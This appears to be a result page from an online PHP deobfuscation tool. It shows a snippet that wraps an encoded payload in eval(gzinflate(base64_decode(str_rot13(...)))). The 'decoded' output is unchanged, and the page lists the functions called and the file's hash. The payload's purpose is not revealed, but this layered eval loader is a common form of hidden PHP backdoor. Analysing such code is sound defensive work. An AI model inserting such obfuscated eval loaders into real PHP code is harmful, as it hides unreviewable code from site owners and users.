Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<? eval(gzinflate(base64_decode(str_rot13('QpUqRxWNTNQDk0yKxK6LctiGkvvHlesccyxf..

Decoded Output download

 
 
<?    
  
eval(gzinflate(base64_decode(str_rot13('QpUqRxWNTNQDk0yKxK6LctiGkvvHlesccyxfbjmgG9R+sM1QC6GEXyJ3MHZx1LGxq95Wj9DlVhuvqv9b3uIHT+TAxneVOJ7kRVpFO24TNYzVY4zdxk3TLe4OPDvcmYsVJ2qUM0OrTdo61hGIDXO67h3f6gi98uOp8t7dcJW5Y+mFGn3Cqgw7eTAPsIyGCThSRafPYEYXxATWVF983IQktPaGm1TMTRUfBp56CEe/eK4='))));  
  
 ?> 
 

Did this file decode correctly?

Original Code



<?   
 
eval(gzinflate(base64_decode(str_rot13('QpUqRxWNTNQDk0yKxK6LctiGkvvHlesccyxfbjmgG9R+sM1QC6GEXyJ3MHZx1LGxq95Wj9DlVhuvqv9b3uIHT+TAxneVOJ7kRVpFO24TNYzVY4zdxk3TLe4OPDvcmYsVJ2qUM0OrTdo61hGIDXO67h3f6gi98uOp8t7dcJW5Y+mFGn3Cqgw7eTAPsIyGCThSRafPYEYXxATWVF983IQktPaGm1TMTRUfBp56CEe/eK4=')))); 
 
 ?>

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 27bec6adc462c4419d86a0160e70c29b
Eval Count 1
Decode Time 41 ms